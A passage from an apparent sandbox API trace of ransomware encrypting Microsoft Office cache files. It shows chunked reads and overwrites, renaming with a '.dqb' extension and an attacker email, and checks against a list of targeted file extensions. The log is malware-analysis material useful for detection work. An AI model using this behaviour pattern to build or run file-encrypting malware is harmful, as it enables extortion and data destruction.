returned 1 [0046.228] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.228] ReadFile (in: hFile=0x180, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.245] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.245] WriteFile (in: hFile=0x180, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0046.469] SetEndOfFile (hFile=0x180) returned 1 [0046.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0047.155] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.155] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.157] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.157] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.159] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.159] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.161] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0047.161] CloseHandle (hObject=0x180) returned 1 [0047.408] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0047.411] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString=".doc") returned 4 [0047.463] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.463] lstrlenW (lpString=".docx") returned 5 [0047.463] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.463] lstrlenW (lpString=".pdf") returned 4 [0047.463] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.463] lstrlenW (lpString=".xls") returned 4 [0047.463] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.463] lstrlenW (lpString=".xlsx") returned 5 [0047.463] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.463] lstrlenW (lpString=".ppt") returned 4 [0047.463] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString=".zip") returned 4 [0047.463] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.463] lstrlenW (lpString=".rar") returned 4 [0047.463] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.463] lstrlenW (lpString=".bz2") returned 4 [0047.463] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.463] lstrlenW (lpString=".7z") returned 3 [0047.463] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString=".dbf") returned 4 [0047.463] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString=".1cd") returned 4 [0047.463] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.463] lstrlenW (lpString=".jpg") returned 4 [0047.463] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString=".doc") returned 4 [0047.464] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.464] lstrlenW (lpString=".docx") returned 5 [0047.464] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.464] lstrlenW (lpString=".pdf") returned 4 [0047.464] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.464] lstrlenW (lpString=".xls") returned 4 [0047.464] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.464] lstrlenW (lpString=".xlsx") returned 5 [0047.464] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.464] lstrlenW (lpString=".ppt") returned 4 [0047.464] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString=".zip") returned 4 [0047.464] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.464] lstrlenW (lpString=".rar") returned 4 [0047.464] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.464] lstrlenW (lpString=".bz2") returned 4 [0047.464] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.464] lstrlenW (lpString=".7z") returned 3 [0047.464] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString=".dbf") returned 4 [0047.464] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString=".1cd") returned 4 [0047.464] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.464] lstrlenW (lpString=".jpg") returned 4 [0047.464] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.464] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0047.465] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0047.465] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0047.465] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=162970271) returned 1 [0047.465] CloseHandle (hObject=0x1dc) returned 1 [0047.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0047.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.465] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0047.466] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0047.466] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.466] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.466] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.472] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.472] ReadFile (in: hFile=0x1dc, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.479] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.479] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.479] ReadFile (in: hFile=0x1dc, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.497] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.497] WriteFile (in: hFile=0x1dc, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.385] SetEndOfFile (hFile=0x1dc) returned 1 [0048.385] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0048.385] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.385] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.386] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.386] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.389] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.389] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.391] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0048.391] CloseHandle (hObject=0x1dc) returned 1 [0048.391] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".doc") returned 4 [0048.391] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".docx") returned 5 [0048.391] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.391] lstrlenW (lpString=".pdf") returned 4 [0048.391] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".xls") returned 4 [0048.391] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".xlsx") returned 5 [0048.391] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.391] lstrlenW (lpString=".ppt") returned 4 [0048.391] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".zip") returned 4 [0048.391] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".rar") returned 4 [0048.392] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".bz2") returned 4 [0048.392] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.392] lstrlenW (lpString=".7z") returned 3 [0048.392] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString=".dbf") returned 4 [0048.392] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString=".1cd") returned 4 [0048.392] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString=".jpg") returned 4 [0048.392] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString=".doc") returned 4 [0048.392] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".docx") returned 5 [0048.392] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.392] lstrlenW (lpString=".pdf") returned 4 [0048.392] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".xls") returned 4 [0048.392] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".xlsx") returned 5 [0048.392] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.392] lstrlenW (lpString=".ppt") returned 4 [0048.392] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.392] lstrlenW (lpString=".zip") returned 4 [0048.392] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.392] lstrlenW (lpString=".rar") returned 4 [0048.392] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.393] lstrlenW (lpString=".bz2") returned 4 [0048.393] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.393] lstrlenW (lpString=".7z") returned 3 [0048.393] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.393] lstrlenW (lpString=".dbf") returned 4 [0048.393] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.393] lstrlenW (lpString=".1cd") returned 4 [0048.393] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.393] lstrlenW (lpString=".jpg") returned 4 [0048.393] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.393] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0048.393] lstrlenW (lpString="Office32WW.msi") returned 14 [0048.393] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0048.393] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1992192) returned 1 [0048.393] CloseHandle (hObject=0x1dc) returned 1 [0048.394] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0048.394] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.394] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0048.394] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0048.394] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.394] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.394] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.403] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.403] ReadFile (in: hFile=0x1dc, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.406] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.406] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.406] ReadFile (in: hFile=0x1dc, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.634] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.634] WriteFile (in: hFile=0x1dc, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.651] SetEndOfFile (hFile=0x1dc) returned 1 [0048.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0048.840] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.840] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.841] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.841] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.843] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.843] WriteFile (in: hFile=0x1dc, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0048.845] CloseHandle (hObject=0x1dc) returned 1 [0048.845] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.845] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.845] lstrlenW (lpString=".doc") returned 4 [0048.845] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.845] lstrlenW (lpString=".docx") returned 5 [0048.845] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.845] lstrlenW (lpString=".pdf") returned 4 [0048.845] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.845] lstrlenW (lpString=".xls") returned 4 [0048.845] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.845] lstrlenW (lpString=".xlsx") returned 5 [0048.846] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.846] lstrlenW (lpString=".ppt") returned 4 [0048.846] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW (lpString=".zip") returned 4 [0048.846] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.846] lstrlenW (lpString=".rar") returned 4 [0048.846] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.846] lstrlenW (lpString=".bz2") returned 4 [0048.846] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.846] lstrlenW (lpString=".7z") returned 3 [0048.846] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW (lpString=".dbf") returned 4 [0048.846] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW (lpString=".1cd") returned 4 [0048.846] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW 